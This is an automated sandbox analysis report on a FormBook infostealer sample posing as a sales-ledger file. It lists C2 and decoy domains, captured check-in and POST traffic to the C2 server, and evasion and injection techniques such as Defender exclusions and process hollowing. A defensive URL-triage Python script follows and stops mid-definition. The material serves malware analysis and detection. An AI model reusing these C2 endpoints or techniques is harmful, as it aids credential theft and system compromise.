Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Sample Name: Require your Sales Ledger from 01-April-2020.exe
Analysis ID: 385451
MD5: c7c27e1859f1593aedb1eebf0a15175e
SHA1: deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256: d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
Tags: exe
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Require your Sales Ledger from 01-April-2020.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 4x nop then pop ebx 24_2_00407B02
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 4x nop then pop edi 24_2_00416CB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop ebx 32_2_02B17B02
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 32_2_02B26CBF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.consultoramulticars.com/suod/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 170153Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: C:\Windows\explorer.exe Code function: 25_2_061C67C2 getaddrinfo,setsockopt,recv, 25_2_061C67C2
Source: unknown DNS traffic detected: queries for: www.seniorlivingcaelderly.com
Source: unknown HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: explorer.exe, 00000019.00000000.349774799.0000000008A2E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icogk
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnto
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmcP
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/-czti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Bi)
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ftYi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Yi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/d.
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/5i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/fi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/q
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/s20
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpc
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp.
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpj
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehp
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://www.nirsoft.net/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com
Source: explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp String found in binary or memory: http://www.seniorlivingcaelderly.com/suod/
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/4
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/5
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
Source: cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=05
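Most of the URLs above are noise: font-vendor links carried in font files, MSN and Chrome defaults, a CA policy URL, the library sites of components the sample bundles. The string worth attention is the one that appears only in the memory of explorer.exe and cmmon32.exe, the two system processes the report elsewhere identifies as injection targets. The following script, an added example and not part of the sandbox output, sorts such lines into benign, mangled (an allowlisted host with trailing bytes glued on by string extraction) and review buckets, and records which processes held each URL. The allowlist is this example's assumption, and the input is a constructed excerpt copied from the lines above.

```python
"""Sort the URLs a sandbox lifts out of process memory into known-benign noise
and strings that deserve a look, and note which processes held each one.

Added example written for this report; it is not part of the sandbox's own
tooling. BENIGN_HOSTS is this example's assumption, and SAMPLE_LINES is a
constructed excerpt copied from the "String found in binary or memory"
findings in the report.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

STRING_LINE_RE = re.compile(
    r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)$")

# Hosts that show up in memory strings of almost any process on a lab VM:
# font-vendor URLs baked into font files, browser and MSN defaults, CA policy
# links, and the libraries this sample bundles. Assumed for the example.
BENIGN_HOSTS = {
    "www.msn.com", "www.google.com", "sectigo.com", "github.com",
    "www.newtonsoft.com", "www.nirsoft.net", "www.sajatypeworks.com",
    "www.sakkal.com", "www.sandoll.co.kr", "www.tiro.com",
    "www.typography.net", "www.urwpp.de", "www.zhongyicts.com.cn",
}


def parse_string_lines(lines):
    """Map each URL to the set of processes or dropped files whose memory held it."""
    holders = defaultdict(set)
    for line in lines:
        m = STRING_LINE_RE.match(line.strip())
        if not m:
            continue
        # The source field alternates "<process>, <dump id>.sdmp"; dropped-file
        # references such as "AdvancedRun.exe.0.dr" stand alone. Keep the names only.
        names = {tok for tok in m["sources"].split(", ") if not tok.endswith(".sdmp")}
        holders[m["url"]] |= names
    return dict(holders)


def classify_host(host):
    """'benign' on an exact allowlist hit; 'mangled' when the host is an allowlisted
    name with extra characters appended (e.g. 'www.typography.netd', where the
    extractor glued on the byte that followed the string); otherwise 'review'."""
    if host in BENIGN_HOSTS:
        return "benign"
    if any(host.startswith(b) for b in BENIGN_HOSTS):
        return "mangled"
    return "review"


def triage_urls(text):
    """Return {'benign': {url: [holders]}, 'mangled': {...}, 'review': {...}}."""
    out = {"benign": {}, "mangled": {}, "review": {}}
    for url, names in parse_string_lines(text.splitlines()).items():
        bucket = classify_host(urlsplit(url).hostname or "")
        out[bucket][url] = sorted(names)
    return out


# Constructed excerpt of the report's own lines (shortened to a representative subset).
SAMPLE_LINES = """
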